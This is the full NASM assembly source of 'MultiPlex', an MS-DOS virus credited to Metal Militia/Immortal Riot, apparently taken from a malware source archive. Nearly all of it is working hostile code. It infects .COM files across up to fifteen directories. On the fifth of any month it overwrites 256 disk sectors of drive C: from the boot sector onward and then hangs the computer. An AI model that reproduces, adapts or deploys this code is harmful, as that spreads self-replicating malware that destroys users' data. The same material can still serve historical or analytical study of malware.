MalwareSourceCode/MSDOS/M-Index/Virus.MSDOS.Unknown.multiplx.asm

284 lines
10 KiB
NASM
Raw Permalink Normal View History

2022-08-21 09:07:57 +00:00
; Virusname: MultiPlex
; Alias(es): None
; Origin : Sweden
; Author : Metal Militia/Immortal Riot
;
; Thisone's a non-res/non-ow/non-encrypted infector of .COM files which
; travels thrue one directory on your harddrive each time an infected
; file's executed.
;
; I'ts damage routine will be activated if the date's equal to the fifth
; of any month. If so, it does an good 'ol 256 which does it's dirty
; work just as good as MULTI-FLU's 9999.
;
code segment
assume cs:code,ds:code,es:code
org 0100h
start_o_virus: mov si,0 ; sub/xor si,si
jmp mejntwo ; jump there
db 'IR'
lengthovir equ offset tag+5-offset mejntwo ; Length of virus
mejntwo: call nextline ; prepear to put ax in si (no 'BP' here)
nextline: pop ax ; Pop 'em
sub ax,offset nextline ; and offset
call xchg_it ; Now, exchange
mejnthree: call restore_one ; Restore the
call restore_two ; first original bytes
getdir: mov ah,47h ; Get (current) directory
mov dl,00h ; to restore it later
push si ; Now, push it
lea bx,(origindir+si) ; and offset the
mov si,bx ; place to save it in
int 21h
jc lexit ; If there's an error, exit
pop si ; Pop it
mov byte ptr ds:[rock+si],00h ; and set 'rock' to zero
setdta: mov ah,1ah ; Now, set the DTA (needed
lea dx,(buffa+si) ; to be able to execute
int 21h ; programs with 'choices')
findfile: lea dx,(searchein+si) ; What files to search for
call find_first ; Find first '*.com'
jnc openup ; If no error, infect
cmp al,12h ; Was there no files left?
jne lexit ; If not, outa here!!!!!
jmp next_dir ; Move to the next dir
lexit: jmp exit ; long exit jumps to small
openup: mov ah,3dh ; Open the file
mov al,02h
lea dx,(buffa+1eh+si)
int 21h
jc lexit
mov ds:[handle+si],ax
movepoint: mov ah,42h ; mov ax,4202h
mov al,02h ; (move to end of file)
call bx_ds ; handle stuff
mov cx,cxequals
mov dx,dxequals
int 21h
jc lclose ; was there an error?
jmp checkmark ; if not, continue
lclose: jmp close ; long close to short close
checkmark: mov ah,3fh ; read in the first
call bx_ds
call cx_em ; see if already infected
lea dx,(firsties+si) ; so we read in the first
int 21h ; bytes to our buffa
jc lclose
lea di,(tag+si) ; read in our tag
lea ax,(firsties+si) ; does it match?
call xchg_it
call cx_em
compare: cmpsb
jnz infect ; if so, then
loop compare ; just go ahead
call xchg_it ; to hunt down
jmp next_file ; the next file
infect: call xchg_it
mov ah,42h ; move to start of file
mov al,00h
call bx_ds
sub cx,cx ; mov cx,0 xor cx,cx
cwd ; xor dx,dx sub dx,dx
int 21h
jc lclose
mov ah,3fh ; this time, read in
call bx_ds
lea dx,(oldstart+si) ; (saving in 'oldstart')
call cx_four ; the first four bytes
int 21h
jc lclose
mov ah,42h ; now, move to end of file
mov al,02h
call bx_ds
sub cx,cx ; xor cx,cx etc. etc.
cwd ; xor dx,dx etc. etc.
int 21h
jc lclose
sub ax,3h
mov word ptr ds:[jump+1+si],ax
call write_us ; call to write our code
mov ah,42h ; move to start of file
mov al,00h
call bx_ds
sub cx,cx
cwd
int 21h
call write_em ; write to file
call bx_ds
call cx_three ; 3 bytes
lea dx,(jump+si) ; our own 'JMP'
int 21h
call change_dir ; change directory
lea dx,(rootoz+si) ; to root
int 21h
jmp close ; now, close the file
next_dir: cmp ds:[diroz],15 ; are we thrue with atleast
je exit ; 15 directories yet? exit!
mov ah,1ah ; Set the DTA to our
lea dx,(buffatwo+si) ; second '60 dup (0)' buffa
int 21h
call change_dir ; Change directory
call root_dir ; to the root
cmp byte ptr ds:[rock+si],00h ; Is 'rock' still zero?
jne nextdir2 ; If not, get next 'DIR'
mov byte ptr ds:[rock+si],0ffh ; Now set the 'flag'
lea dx,(searchzwei+si) ; and start to look for
sub cx,cx ; dir's instead
mov bx,cx
mov cl,10h
call find_first ; find first of 'em
jc exit ; error? outa here!
jmp chdir ; otherwise, get that DIR
nextdir2: call find_next ; find next DIR
jc exit ; error, none left? exit!
inc ds:[diroz+si] ; increase the flag to
; tell we've found a DIR.
chdir: call change_dir ; change to that DIR
lea dx,(buffatwo+1eh+si) ; we've just found
int 21h
jmp setdta ; now, set the DTA again
close: call close_em ; close everything
runold: mov ah,2ah ; date date
int 21h
cmp dl,5 ; fifth of any month?
jne mov_jmp ; if not, outa here
mov al,2 ; C:
mov cx,256 ; 256
cwd ; starting w/the boot
int 26h ; direct diskwrite
jmp $ ; hang computer
mov_jmp:
mov ax,0100h ; and run the org. proggy
jmp ax
next_file: call close_em ; call to close the file
call find_next ; call to find next file
jc next_dir ; if none found, change
; directory
jmp openup ; else, open and infect
exit: mov ah,3bh ;call change_dir
lea dx,(origindir+si) ; offset 'current'
int 21h
jmp runold ; and run the org. proggy
oldstart: mov ah,4ch
int 21h
jump db 0e9h,0,0 ; our 'jmp'
virusname db ' MULTiPLEX '
rock db 00h
c_author db '(c) 1994 Metal Militia'
rootdiroz db '\',00h
grouporigin db 'Immortal Riot, Sweden'
searchzwei db '*. ',00h
greetings db 'Somewhere, somehow, always :)'
searchein db '*.com',00h
write_us: call write_em ; write to file
call bx_ds
mov cx,lengthovir ; our viruscode
lea dx,(mejntwo+si)
int 21h
ret
handle dw 0h
close_em: mov ah,3eh ; close file
call bx_ds
int 21h
ret
origindir db 64 dup (0) ; buffer where we save our original dir.
change_dir: mov ah,3bh ; change dir
ret
root_dir: lea dx,(rootdiroz+si) ; when changing to the 'root'
int 21h
ret
find_first:
mov ah,4eh ; find first file
jmp int_em
restore_two:
mov ds:[0100h],ax ; restore old first
mov ds:[0102h],cx ; 2/2
ret
int_em:
int 21h
ret
buffa db 60h dup (0)
xchg_it: xchg si,ax
ret
buffatwo db 60h dup (0)
find_next:
mov ah,4fh ; find next file
jmp int_em
firsties db 5 dup (?) ; Buffer for the first five org. bytes
bx_ds:
mov bx,ds:[handle+si]
ret
write_em: mov ah,40h ; Write to file
ret
cx_em: mov cx,05h
ret
diroz dw 0h
cx_three: mov cx,3
ret
cx_four: mov cx,4
ret
restore_one: mov ax,word ptr ds:[oldstart+si] ; restore old first
mov cx,word ptr ds:[oldstart+si+2] ; 1/2
ret
tag db 'ImRio' ; My lil' DIGITAL GRAFITTI
rootoz db '\' ; when changing to root
cxequals equ 0ffffh
dxequals equ 0fffbh
code ends
end start_o_virus